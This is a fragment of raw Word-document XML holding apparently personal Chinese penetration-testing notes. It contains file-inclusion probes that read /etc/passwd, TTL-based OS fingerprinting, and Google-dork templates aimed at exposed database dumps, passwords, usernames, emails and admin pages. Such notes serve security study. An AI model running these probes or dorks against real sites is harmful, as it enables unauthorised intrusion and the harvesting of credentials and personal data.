          <w:t>https://xz.aliyun.com/t/6594</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58FD4567" w14:textId="77777777" w:rsidR="00D75791" w:rsidRDefault="00D75791" w:rsidP="00D75791"/>
    <w:p w14:paraId="075C5ADC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file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7D16669C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nam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5F6B73D1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lo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38471096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19542768" w14:textId="77777777" w:rsidR="002D6C60" w:rsidRPr="002D6C60" w:rsidRDefault="002D6C60" w:rsidP="00D75791"/>
    <w:p w14:paraId="4C787D3F" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Index.php?f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=../../../../../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569CA21" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Index.php?f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="067C3194" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Index.php?f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586A938" w14:textId="77777777" w:rsidR="003719B2" w:rsidRDefault="003719B2" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16BADB" w14:textId="77777777" w:rsidR="003719B2" w:rsidRPr="003719B2" w:rsidRDefault="003719B2" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="550B6AE1" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果自动加上后缀的话，用%00截断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32101560" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>参数f的参数值为PHP文件时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10E356" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      1.文件被解析，则是文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE1D74" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      2.显示源代码，则是文件查看漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ECC25B" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      3.提示下载，则是文件下载漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E90762" w14:textId="77777777" w:rsidR="00907A06" w:rsidRDefault="00907A06" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ing判断系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD0AC7" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00907A06" w:rsidP="00D7298B">
      <w:r>
        <w:t xml:space="preserve">UNIX 及类 UNIX </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>操作系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ICMP 回显应答的 TTL 字段值为 255</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">微软 </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> NT/</w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>2K</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>操作系统 ICMP 回显应答的 TTL 字段值为 128</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">微软 Windows </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> 操作系统 ICMP 回显应答的 TTL 字段值为 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45233568" w14:textId="77777777" w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B"/>
    <w:p w14:paraId="72C4AAB3" w14:textId="77777777" w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B"/>
    <w:p w14:paraId="7DD57FA6" w14:textId="77777777" w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B">
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>site：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*.baidu</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="028EEF6E" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="408406A2" w14:textId="77777777" w:rsidR="003439C6" w:rsidRDefault="003439C6" w:rsidP="003439C6">
      <w:r w:rsidRPr="003439C6">
        <w:t>intitle</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：搜索网页标题中包含有特定字符的网页。例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t xml:space="preserve">intitle: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样网页标题中带有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的网页都会被搜索出来。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>：搜索包含有特定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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>inurl:mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>，则可以找到带有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>intext:</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索网页正文内容中的指定字符，例如输入“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>intext:mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似我们平时在某些网站中使用的“文章内容搜索”功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>filetype:</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索指定类型的文件。例如输入“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>filetype:mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将返回所有以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结尾的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>：找到与指定网站有联系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r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Site:mst.hi-ourlife.com”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>。所有和这个网站有</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联系的</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都会被显示。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF4D1F" w14:textId="77777777" w:rsidR="003630CF" w:rsidRDefault="003630CF" w:rsidP="003439C6"/>
    <w:p w14:paraId="143E67B2" w14:textId="77777777" w:rsidR="003630CF" w:rsidRDefault="003630CF" w:rsidP="003439C6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新思路（先filetype</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集一下敏感信息：.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="391CCB71" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w14:paraId="20B5753C" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w14:paraId="6C5F47B3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目录列表的敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E941E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lastRenderedPageBreak/>
        <w:t>1.(site:域名）intitle:"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index.of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"(|intitle:...) (intext:)"敏感文件名/敏感后缀名" (|intext:...) (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47950090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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中能访问的敏感文件或者目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4380F6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1.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"敏感文件名/目录名"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 (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB71F61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2.(site:域名) filetype:后缀名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文件名(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) (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BA70D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3.(site:域名) intext:"文件中独一无二的短语" (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01847D43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特定的服务器版本的网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6173B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text:"Apache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/1.3.27 Server at" (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14760C80" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>数据库的转储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA562E" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) # Dumping data for table(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user|username|password|pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058E7B8" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找子域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE62D9" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:"主机名" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>site:"</w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>.主机名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE2F2FB" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找网站中泄露出的邮箱地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9039FC" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">site:域名 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:"email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"(|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>intext:...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D583A" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>更多组合 我们可以把自己的搜索与能获取更好的结果的搜索</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>项一起</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFEA7A0" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>1.当查找email时，能添加类似 通讯录 邮件 电子邮件 发送这种关键词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A717705" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>2.查找电话号码的时候可以使用一些类似 电话 移动电话 通讯录 数字 手机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFE91B" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找网站中的人的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEBF65" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:域名 intext:"人的信息"(|intext:...) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51917901" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>用户名相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DC0A2E" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) intext:"username"|intext:"userid"|intext:"employee.ID"(|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>intext:...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) "your username is" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F795B" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>密码相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F4816" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(site:域名) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:"password"|intext:"passcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"(|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>intext:...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) "your password is" "reminder forgotten" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D5E63" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>公司相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FAF978" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(site:域名) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:"admin"|intext:"administrator"|intext:"contact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system"|intext:"contact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> your administrator" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02415407" w14:textId="77777777" w:rsidR="00A42238" w:rsidRPr="00A42238" w:rsidRDefault="0048048C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Style w:val="aa"/>
        </w:rPr>
        <w:t>filetype:mdb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inurl:com</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
